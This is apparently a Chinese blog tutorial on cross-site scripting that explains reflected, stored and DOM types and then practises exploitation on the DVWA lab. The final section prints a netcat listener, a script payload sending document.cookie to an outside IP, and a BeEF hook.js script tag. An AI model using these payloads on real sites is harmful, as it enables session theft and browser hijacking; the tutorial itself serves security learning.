xss跨站脚本攻击

xss跨站脚本攻击

  • 一.xss简介
  • 二.xss类型
    • 反射型
      • 漏洞成因
      • 攻击流程
      • 实例解析
    • 存储型
      • 漏洞成因
      • 攻击流程
      • 实例解析
    • DOM型XSS
      • 漏洞成因
    • 其他xss
  • 三.xss利用
    • beef平台实操

一.xss简介

xss跨站脚本攻击_第1张图片
跨站脚本(Cross-site scripting,简称为:CSS, 但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,跨站脚本攻击缩写为XSS)是一种网站应用程序的安全漏洞攻击。
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、 LiveScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。

xss跨站脚本攻击_第2张图片
xss跨站脚本攻击_第3张图片
xss跨站脚本攻击_第4张图片
xss跨站脚本攻击_第5张图片

二.xss类型

最常见的几种分类:反射型(非持久型)XSS、存储型(持久型)XSS、DOM型XSS、通用型XSS、突变型XSS。

xss跨站脚本攻击_第6张图片

反射型

反射型XSS只是简单的把用户输入的数据从服务器反射给用户浏览器,要利用这个漏洞,攻击者必须以某种方式诱导用户访问一个精心设计的URL(恶意链接),才能实施攻击。

漏洞成因

当用户的输入或者一些用户可控参数未经处理地输出到页面上,就容易产生XSS漏洞

攻击流程

反射型XSS通常出现在搜索等功能中,需要被攻击者点击对应的链接才能触发,且受到XSS Auditor(chrome内置的XSS保护)、NoScript等防御手段的影响较大,所以它的危害性较存储型要小。
xss跨站脚本攻击_第7张图片

实例解析

xss跨站脚本攻击_第8张图片
xss跨站脚本攻击_第9张图片

存储型

存储型(或 HTML 注入型/持久型)XSS 攻击最常发生在由社区内容驱动的网站或 Web 邮件网站,不需要特制的链接来执行。黑客仅仅需要提交 XSS 漏洞利用代码(反射型XSS通常只在url中)到一个网站上其他用户可能访问的地方。这些地区可能是博客评论,用户评论,留言板,聊天室,HTML 电子邮件,wikis,和其他的许多地方。一旦用户访问受感染的页,执行是自动的。

漏洞成因

存储型XSS漏洞的成因与反射型的根源类似,不同的是恶意代码会被保存在服务器中,导致其它用户(前端)和管理员(前后端)在访问资源时执行了恶意代码,用户访问服务器-跨站链接-返回跨站代码。

攻击流程

xss跨站脚本攻击_第10张图片

实例解析

xss跨站脚本攻击_第11张图片
xss跨站脚本攻击_第12张图片
xss跨站脚本攻击_第13张图片
xss跨站脚本攻击_第14张图片

DOM型XSS

通过修改页面的DOM节点形成的XSS,称之为DOM Based XSS。

漏洞成因

DOM型XSS是基于DOM文档对象模型的。对于浏览器来说,DOM文档就是一份XML文档,当有了这个标准的技术之后,通过JavaScript就可以轻松的访问DOM。当确认客户端代码中有DOM型XSS漏洞时,诱使(钓鱼)一名用户访问自己构造的URL,利用步骤和反射型很类似,但是唯一的区别就是,构造的URL参数不用发送到服务器端,可以达到绕过WAF、躲避服务端的检测效果。

xss跨站脚本攻击_第15张图片

其他xss

xss跨站脚本攻击_第16张图片

xss跨站脚本攻击_第17张图片

xss跨站脚本攻击_第18张图片

xss跨站脚本攻击_第19张图片

xss跨站脚本攻击_第20张图片
xss跨站脚本攻击_第21张图片

三.xss利用

xss跨站脚本攻击_第22张图片
xss跨站脚本攻击_第23张图片

xss跨站脚本攻击_第24张图片

xss跨站脚本攻击_第25张图片
xss跨站脚本攻击_第26张图片
在这里我们可以使用dvwa靶场进行尝试
我们首先打开vps,随便监听一个端口

nc  -kvvl  0.0.0.0 456

这里为什么不监听127.0.0.1呢,而是0.0.0.0
“nc 0.0.0.0 456” 和 “nc 127.0.0.1 456” 在功能上有一些不同。
“nc 0.0.0.0 456” 命令会使 netcat 工具在本地所有可用接口的456端口上监听连接。这意味着无论是从本地机器还是从其他计算机上尝试连接到该IP地址和端口,都将被接受。
而 “nc 127.0.0.1 456” 命令会使 netcat 工具在本地回环地址(即 localhost 或本地主机)上的456端口上监听连接。这意味着只有在同一台计算机上的进程尝试连接到该IP地址和端口时,连接才会被接受。
换句话说,“nc 0.0.0.0 456” 允许来自本地和外部网络的连接,而 “nc 127.0.0.1 456” 只允许来自同一台计算机的连接。

然后我们在dvwa靶场先把等级调成low
xss跨站脚本攻击_第27张图片

找到xss的反射型
输入我们的js命令

<script>window.location.href="http://119.3.213.143:456/?cookie="+document.cookie</script>

之后我们的服务器上就会出现如下cookie数据,表示我们截取cookie成功
xss跨站脚本攻击_第28张图片

xss跨站脚本攻击_第29张图片
xss跨站脚本攻击_第30张图片
xss跨站脚本攻击_第31张图片
xss跨站脚本攻击_第32张图片
xss跨站脚本攻击_第33张图片
xss跨站脚本攻击_第34张图片xss跨站脚本攻击_第35张图片

xss跨站脚本攻击_第36张图片
xss跨站脚本攻击_第37张图片
xss跨站脚本攻击_第38张图片
xss跨站脚本攻击_第39张图片
xss跨站脚本攻击_第40张图片
xss跨站脚本攻击_第41张图片
xss跨站脚本攻击_第42张图片
xss跨站脚本攻击_第43张图片
xss跨站脚本攻击_第44张图片

beef平台实操

beef安装教程我放这里了
https://mambainveins.gitee.io/mambainveins/2020/07/06/2020-07-06-docker_beef/
我们登陆beef后

就如同上面讲的那样,点击hook me
xss跨站脚本攻击_第45张图片

点击以后,我们就与这个网站产生了联系
之后我们构造js插入到dvwa靶场试一下

<script src="http://119.3.213.143:30000/hook.js"></script>

你可能感兴趣的:(xss,前端)